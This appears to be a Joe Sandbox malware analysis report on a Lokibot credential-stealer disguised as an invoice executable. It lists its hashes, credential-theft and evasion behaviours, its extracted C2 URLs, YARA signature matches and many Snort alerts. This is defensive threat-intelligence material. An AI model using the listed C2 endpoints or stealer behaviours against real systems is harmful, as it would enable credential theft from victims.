Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
INV.2022LB0362 FORM CO (2).exe

Overview

General Information

Sample Name:INV.2022LB0362 FORM CO (2).exe
Analysis ID:756310
MD5:baed30aea51e6000571219633aa745b0
SHA1:d7e3b155c00245a7f867dd2fb4c06cb7be6ec3f7
SHA256:57520e51bb0820741b7883926800223886c491a8a5ddd517a49b0e2cc752fb18
Tags:exeLoki
Infos:

Detection

Lokibot
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
Yara detected Lokibot
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Snort IDS alert for network traffic
Tries to steal Mail credentials (via file / registry access)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Yara detected aPLib compressed binary
Tries to harvest and steal ftp login credentials
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
.NET source code contains potential unpacker
C2 URLs / IPs found in malware configuration
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
May sleep (evasive loops) to hinder dynamic analysis
Internet Provider seen in connection with other malware
Detected potential crypto function
Yara detected Credential Stealer
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Sample file is different than original file name gathered from version info
Uses a known web browser user agent for HTTP communication
Binary contains a suspicious time stamp
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w10x64
  • cleanup
{"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "http://sempersim.su/gm11/fre.php"]}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Lokibot_1Yara detected LokibotJoe Security
    SourceRuleDescriptionAuthorStrings
    00000000.00000002.262961989.0000000003F9B000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000000.00000002.262961989.0000000003F9B000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
        00000000.00000002.262961989.0000000003F9B000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_LokibotYara detected LokibotJoe Security
          00000000.00000002.262961989.0000000003F9B000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Lokibot_1f885282unknownunknown
          • 0x180c8:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
          00000000.00000002.262961989.0000000003F9B000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Lokibot_0f421617unknownunknown
          • 0x5493:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
          Click to see the 27 entries
          SourceRuleDescriptionAuthorStrings
          0.2.INV.2022LB0362 FORM CO (2).exe.3f81cb8.13.unpackSUSP_XORed_URL_in_EXEDetects an XORed URL in an executableFlorian Roth
          • 0x13278:$s1: http://
          • 0x16233:$s1: http://
          • 0x16c74:$s1: \x97\x8B\x8B\x8F\xC5\xD0\xD0
          • 0x13280:$s2: https://
          • 0x13278:$f1: http://
          • 0x16233:$f1: http://
          • 0x13280:$f2: https://
          0.2.INV.2022LB0362 FORM CO (2).exe.3f81cb8.13.unpackJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
            0.2.INV.2022LB0362 FORM CO (2).exe.3f81cb8.13.unpackWindows_Trojan_Lokibot_1f885282unknownunknown
            • 0x15ff0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
            0.2.INV.2022LB0362 FORM CO (2).exe.3f81cb8.13.unpackWindows_Trojan_Lokibot_0f421617unknownunknown
            • 0x3bbb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
            0.2.INV.2022LB0362 FORM CO (2).exe.3f81cb8.13.unpackLoki_1Loki Payloadkevoreilly
            • 0x131b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW
            • 0x133fc:$a2: last_compatible_version
            Click to see the 43 entries
            No Sigma rule has matched
            Timestamp:192.168.2.395.213.216.20249705802024318 11/30/22-00:54:20.168790
            SID:2024318
            Source Port:49705
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249702802021641 11/30/22-00:54:14.871390
            SID:2021641
            Source Port:49702
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249738802024313 11/30/22-00:55:23.450513
            SID:2024313
            Source Port:49738
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249734802825766 11/30/22-00:55:16.065951
            SID:2825766
            Source Port:49734
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:95.213.216.202192.168.2.380497272025483 11/30/22-00:55:04.982566
            SID:2025483
            Source Port:80
            Destination Port:49727
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249741802024313 11/30/22-00:55:29.247109
            SID:2024313
            Source Port:49741
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249701802825766 11/30/22-00:54:12.581436
            SID:2825766
            Source Port:49701
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249749802025381 11/30/22-00:55:43.976237
            SID:2025381
            Source Port:49749
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249759802825766 11/30/22-00:56:01.042444
            SID:2825766
            Source Port:49759
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249738802024318 11/30/22-00:55:23.450513
            SID:2024318
            Source Port:49738
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249735802021641 11/30/22-00:55:17.863854
            SID:2021641
            Source Port:49735
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249705802024313 11/30/22-00:54:20.168790
            SID:2024313
            Source Port:49705
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249741802024318 11/30/22-00:55:29.247109
            SID:2024318
            Source Port:49741
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:95.213.216.202192.168.2.380497232025483 11/30/22-00:54:57.894669
            SID:2025483
            Source Port:80
            Destination Port:49723
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249752802025381 11/30/22-00:55:49.378987
            SID:2025381
            Source Port:49752
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249716802025381 11/30/22-00:54:43.829219
            SID:2025381
            Source Port:49716
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249707802021641 11/30/22-00:54:24.716724
            SID:2021641
            Source Port:49707
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249757802025381 11/30/22-00:55:58.948901
            SID:2025381
            Source Port:49757
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249730802021641 11/30/22-00:55:08.823725
            SID:2021641
            Source Port:49730
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.38.8.8.861416532014169 11/30/22-00:55:12.379224
            SID:2014169
            Source Port:61416
            Destination Port:53
            Protocol:UDP
            Classtype:Potentially Bad Traffic
            Timestamp:192.168.2.38.8.8.860088532014169 11/30/22-00:55:21.529314
            SID:2014169
            Source Port:60088
            Destination Port:53
            Protocol:UDP
            Classtype:Potentially Bad Traffic
            Timestamp:192.168.2.395.213.216.20249713802024313 11/30/22-00:54:37.979213
            SID:2024313
            Source Port:49713
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249726802825766 11/30/22-00:55:01.673863
            SID:2825766
            Source Port:49726
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249713802024318 11/30/22-00:54:37.979213
            SID:2024318
            Source Port:49713
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.38.8.8.857743532014169 11/30/22-00:55:08.735474
            SID:2014169
            Source Port:57743
            Destination Port:53
            Protocol:UDP
            Classtype:Potentially Bad Traffic
            Timestamp:192.168.2.395.213.216.20249754802825766 11/30/22-00:55:53.496270
            SID:2825766
            Source Port:49754
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:95.213.216.202192.168.2.380497572025483 11/30/22-00:55:59.773200
            SID:2025483
            Source Port:80
            Destination Port:49757
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249744802025381 11/30/22-00:55:34.401351
            SID:2025381
            Source Port:49744
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.38.8.8.859820532014169 11/30/22-00:55:29.162121
            SID:2014169
            Source Port:59820
            Destination Port:53
            Protocol:UDP
            Classtype:Potentially Bad Traffic
            Timestamp:192.168.2.38.8.8.853305532014169 11/30/22-00:54:54.648302
            SID:2014169
            Source Port:53305
            Destination Port:53
            Protocol:UDP
            Classtype:Potentially Bad Traffic
            Timestamp:95.213.216.202192.168.2.380497532025483 11/30/22-00:55:52.887247
            SID:2025483
            Source Port:80
            Destination Port:49753
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249708802025381 11/30/22-00:54:26.803652
            SID:2025381
            Source Port:49708
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:95.213.216.202192.168.2.380497162025483 11/30/22-00:54:45.204539
            SID:2025483
            Source Port:80
            Destination Port:49716
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:95.213.216.202192.168.2.380497382025483 11/30/22-00:55:24.982216
            SID:2025483
            Source Port:80
            Destination Port:49738
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249758802024313 11/30/22-00:56:00.034214
            SID:2024313
            Source Port:49758
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249755802021641 11/30/22-00:55:55.653974
            SID:2021641
            Source Port:49755
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:95.213.216.202192.168.2.380497302025483 11/30/22-00:55:10.337695
            SID:2025483
            Source Port:80
            Destination Port:49730
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:95.213.216.202192.168.2.380497342025483 11/30/22-00:55:17.565495
            SID:2025483
            Source Port:80
            Destination Port:49734
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249758802024318 11/30/22-00:56:00.034214
            SID:2024318
            Source Port:49758
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.38.8.8.852387532014169 11/30/22-00:54:14.412323
            SID:2014169
            Source Port:52387
            Destination Port:53
            Protocol:UDP
            Classtype:Potentially Bad Traffic
            Timestamp:192.168.2.395.213.216.20249721802024318 11/30/22-00:54:53.572062
            SID:2024318
            Source Port:49721
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249727802021641 11/30/22-00:55:03.486766
            SID:2021641
            Source Port:49727
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249750802021641 11/30/22-00:55:45.758418
            SID:2021641
            Source Port:49750
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:95.213.216.202192.168.2.380497122025483 11/30/22-00:54:37.552263
            SID:2025483
            Source Port:80
            Destination Port:49712
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249718802825766 11/30/22-00:54:47.592007
            SID:2825766
            Source Port:49718
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.38.8.8.851992532014169 11/30/22-00:55:36.286012
            SID:2014169
            Source Port:51992
            Destination Port:53
            Protocol:UDP
            Classtype:Potentially Bad Traffic
            Timestamp:192.168.2.38.8.8.860625532014169 11/30/22-00:54:18.863516
            SID:2014169
            Source Port:60625
            Destination Port:53
            Protocol:UDP
            Classtype:Potentially Bad Traffic
            Timestamp:192.168.2.395.213.216.20249736802025381 11/30/22-00:55:19.643476
            SID:2025381
            Source Port:49736
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249721802024313 11/30/22-00:54:53.572062
            SID:2024313
            Source Port:49721
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249746802825766 11/30/22-00:55:38.275174
            SID:2825766
            Source Port:49746
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249722802021641 11/30/22-00:54:54.732179
            SID:2021641
            Source Port:49722
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249699802025381 11/30/22-00:54:07.324934
            SID:2025381
            Source Port:49699
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249714802021641 11/30/22-00:54:39.977728
            SID:2021641
            Source Port:49714
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:95.213.216.202192.168.2.380497492025483 11/30/22-00:55:45.483574
            SID:2025483
            Source Port:80
            Destination Port:49749
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249712802025381 11/30/22-00:54:35.972913
            SID:2025381
            Source Port:49712
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.38.8.8.857840532014169 11/30/22-00:54:09.401173
            SID:2014169
            Source Port:57840
            Destination Port:53
            Protocol:UDP
            Classtype:Potentially Bad Traffic
            Timestamp:192.168.2.38.8.8.858301532014169 11/30/22-00:55:42.001541
            SID:2014169
            Source Port:58301
            Destination Port:53
            Protocol:UDP
            Classtype:Potentially Bad Traffic
            Timestamp:192.168.2.395.213.216.20249740802025381 11/30/22-00:55:27.193434
            SID:2025381
            Source Port:49740
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:95.213.216.202192.168.2.380497422025483 11/30/22-00:55:32.668199
            SID:2025483
            Source Port:80
            Destination Port:49742
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.38.8.8.863562532014169 11/30/22-00:55:23.368358
            SID:2014169
            Source Port:63562
            Destination Port:53
            Protocol:UDP
            Classtype:Potentially Bad Traffic
            Timestamp:95.213.216.202192.168.2.380497412025483 11/30/22-00:55:30.821604
            SID:2025483
            Source Port:80
            Destination Port:49741
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.38.8.8.850784532014169 11/30/22-00:55:55.557056
            SID:2014169
            Source Port:50784
            Destination Port:53
            Protocol:UDP
            Classtype:Potentially Bad Traffic
            Timestamp:192.168.2.395.213.216.20249723802021641 11/30/22-00:54:56.463103
            SID:2021641
            Source Port:49723
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249713802825766 11/30/22-00:54:37.979213
            SID:2825766
            Source Port:49713
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249726802024313 11/30/22-00:55:01.673863
            SID:2024313
            Source Port:49726
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249728802025381 11/30/22-00:55:05.285201
            SID:2025381
            Source Port:49728
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249726802024318 11/30/22-00:55:01.673863
            SID:2024318
            Source Port:49726
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249737802025381 11/30/22-00:55:21.614296
            SID:2025381
            Source Port:49737
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:95.213.216.202192.168.2.380497112025483 11/30/22-00:54:35.462242
            SID:2025483
            Source Port:80
            Destination Port:49711
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.38.8.8.856949532014169 11/30/22-00:54:59.841953
            SID:2014169
            Source Port:56949
            Destination Port:53
            Protocol:UDP
            Classtype:Potentially Bad Traffic
            Timestamp:192.168.2.395.213.216.20249753802024318 11/30/22-00:55:51.242717
            SID:2024318
            Source Port:49753
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249753802024313 11/30/22-00:55:51.242717
            SID:2024313
            Source Port:49753
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:95.213.216.202192.168.2.380497082025483 11/30/22-00:54:28.382639
            SID:2025483
            Source Port:80
            Destination Port:49708
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249714802825766 11/30/22-00:54:39.977728
            SID:2825766
            Source Port:49714
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249725802024313 11/30/22-00:54:59.930841
            SID:2024313
            Source Port:49725
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249756802025381 11/30/22-00:55:57.533680
            SID:2025381
            Source Port:49756
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.38.8.8.860825532014169 11/30/22-00:55:59.940841
            SID:2014169
            Source Port:60825
            Destination Port:53
            Protocol:UDP
            Classtype:Potentially Bad Traffic
            Timestamp:192.168.2.395.213.216.20249754802024313 11/30/22-00:55:53.496270
            SID:2024313
            Source Port:49754
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249748802021641 11/30/22-00:55:42.098367
            SID:2021641
            Source Port:49748
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249725802024318 11/30/22-00:54:59.930841
            SID:2024318
            Source Port:49725
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249742802021641 11/30/22-00:55:31.101064
            SID:2021641
            Source Port:49742
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249755802825766 11/30/22-00:55:55.653974
            SID:2825766
            Source Port:49755
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249754802024318 11/30/22-00:55:53.496270
            SID:2024318
            Source Port:49754
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249709802025381 11/30/22-00:54:29.164231
            SID:2025381
            Source Port:49709
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.38.8.8.849977532014169 11/30/22-00:54:06.875981
            SID:2014169
            Source Port:49977
            Destination Port:53
            Protocol:UDP
            Classtype:Potentially Bad Traffic
            Timestamp:192.168.2.38.8.8.856924532014169 11/30/22-00:54:16.879287
            SID:2014169
            Source Port:56924
            Destination Port:53
            Protocol:UDP
            Classtype:Potentially Bad Traffic
            Timestamp:192.168.2.395.213.216.20249700802024317 11/30/22-00:54:09.487691
            SID:2024317
            Source Port:49700
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249739802825766 11/30/22-00:55:25.267085
            SID:2825766
            Source Port:49739
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.38.8.8.860582532014169 11/30/22-00:54:28.778637
            SID:2014169
            Source Port:60582
            Destination Port:53
            Protocol:UDP
            Classtype:Potentially Bad Traffic
            Timestamp:95.213.216.202192.168.2.380497192025483 11/30/22-00:54:51.280995
            SID:2025483
            Source Port:80
            Destination Port:49719
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.38.8.8.864595532014169 11/30/22-00:55:31.020256
            SID:2014169
            Source Port:64595
            Destination Port:53
            Protocol:UDP
            Classtype:Potentially Bad Traffic
            Timestamp:192.168.2.395.213.216.20249742802825766 11/30/22-00:55:31.101064
            SID:2825766
            Source Port:49742
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249700802024312 11/30/22-00:54:09.487691
            SID:2024312
            Source Port:49700
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249711802025381 11/30/22-00:54:33.859062
            SID:2025381
            Source Port:49711
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.38.8.8.860767532014169 11/30/22-00:54:45.460012
            SID:2014169
            Source Port:60767
            Destination Port:53
            Protocol:UDP
            Classtype:Potentially Bad Traffic
            Timestamp:192.168.2.395.213.216.20249739802021641 11/30/22-00:55:25.267085
            SID:2021641
            Source Port:49739
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249724802025381 11/30/22-00:54:58.184483
            SID:2025381
            Source Port:49724
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249751802021641 11/30/22-00:55:47.279515
            SID:2021641
            Source Port:49751
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249758802825766 11/30/22-00:56:00.034214
            SID:2825766
            Source Port:49758
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249710802021641 11/30/22-00:54:31.910937
            SID:2021641
            Source Port:49710
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249711802021641 11/30/22-00:54:33.859062
            SID:2021641
            Source Port:49711
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.38.8.8.849201532014169 11/30/22-00:56:00.958664
            SID:2014169
            Source Port:49201
            Destination Port:53
            Protocol:UDP
            Classtype:Potentially Bad Traffic
            Timestamp:192.168.2.395.213.216.20249729802024313 11/30/22-00:55:07.068054
            SID:2024313
            Source Port:49729
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249758802025381 11/30/22-00:56:00.034214
            SID:2025381
            Source Port:49758
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:95.213.216.202192.168.2.380497262025483 11/30/22-00:55:03.204141
            SID:2025483
            Source Port:80
            Destination Port:49726
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249743802025381 11/30/22-00:55:32.962709
            SID:2025381
            Source Port:49743
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249729802024318 11/30/22-00:55:07.068054
            SID:2024318
            Source Port:49729
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249744802021641 11/30/22-00:55:34.401351
            SID:2021641
            Source Port:49744
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249726802021641 11/30/22-00:55:01.673863
            SID:2021641
            Source Port:49726
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249750802024313 11/30/22-00:55:45.758418
            SID:2024313
            Source Port:49750
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249710802825766 11/30/22-00:54:31.910937
            SID:2825766
            Source Port:49710
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:95.213.216.202192.168.2.380497222025483 11/30/22-00:54:56.166551
            SID:2025483
            Source Port:80
            Destination Port:49722
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249750802024318 11/30/22-00:55:45.758418
            SID:2024318
            Source Port:49750
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249699802021641 11/30/22-00:54:07.324934
            SID:2021641
            Source Port:49699
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:95.213.216.202192.168.2.380497202025483 11/30/22-00:54:53.259308
            SID:2025483
            Source Port:80
            Destination Port:49720
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249701802021641 11/30/22-00:54:12.581436
            SID:2021641
            Source Port:49701
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.38.8.8.853623532014169 11/30/22-00:55:10.547934
            SID:2014169
            Source Port:53623
            Destination Port:53
            Protocol:UDP
            Classtype:Potentially Bad Traffic
            Timestamp:192.168.2.395.213.216.20249754802021641 11/30/22-00:55:53.496270
            SID:2021641
            Source Port:49754
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249715802025381 11/30/22-00:54:42.060768
            SID:2025381
            Source Port:49715
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.38.8.8.852955532014169 11/30/22-00:54:26.705694
            SID:2014169
            Source Port:52955
            Destination Port:53
            Protocol:UDP
            Classtype:Potentially Bad Traffic
            Timestamp:192.168.2.395.213.216.20249740802024313 11/30/22-00:55:27.193434
            SID:2024313
            Source Port:49740
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249740802024318 11/30/22-00:55:27.193434
            SID:2024318
            Source Port:49740
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249738802025381 11/30/22-00:55:23.450513
            SID:2025381
            Source Port:49738
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249731802021641 11/30/22-00:55:10.632751
            SID:2021641
            Source Port:49731
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249752802021641 11/30/22-00:55:49.378987
            SID:2021641
            Source Port:49752
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249703802021641 11/30/22-00:54:16.960834
            SID:2021641
            Source Port:49703
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249712802024313 11/30/22-00:54:35.972913
            SID:2024313
            Source Port:49712
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249727802825766 11/30/22-00:55:03.486766
            SID:2825766
            Source Port:49727
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249717802025381 11/30/22-00:54:45.540558
            SID:2025381
            Source Port:49717
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.38.8.8.859581532014169 11/30/22-00:55:17.784201
            SID:2014169
            Source Port:59581
            Destination Port:53
            Protocol:UDP
            Classtype:Potentially Bad Traffic
            Timestamp:192.168.2.395.213.216.20249712802024318 11/30/22-00:54:35.972913
            SID:2024318
            Source Port:49712
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:95.213.216.202192.168.2.380497312025483 11/30/22-00:55:12.166821
            SID:2025483
            Source Port:80
            Destination Port:49731
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249739802024313 11/30/22-00:55:25.267085
            SID:2024313
            Source Port:49739
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249725802025381 11/30/22-00:54:59.930841
            SID:2025381
            Source Port:49725
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.38.8.8.849166532014169 11/30/22-00:55:40.126118
            SID:2014169
            Source Port:49166
            Destination Port:53
            Protocol:UDP
            Classtype:Potentially Bad Traffic
            Timestamp:192.168.2.38.8.8.860749532014169 11/30/22-00:54:58.103973
            SID:2014169
            Source Port:60749
            Destination Port:53
            Protocol:UDP
            Classtype:Potentially Bad Traffic
            Timestamp:95.213.216.202192.168.2.380497052025483 11/30/22-00:54:21.783216
            SID:2025483
            Source Port:80
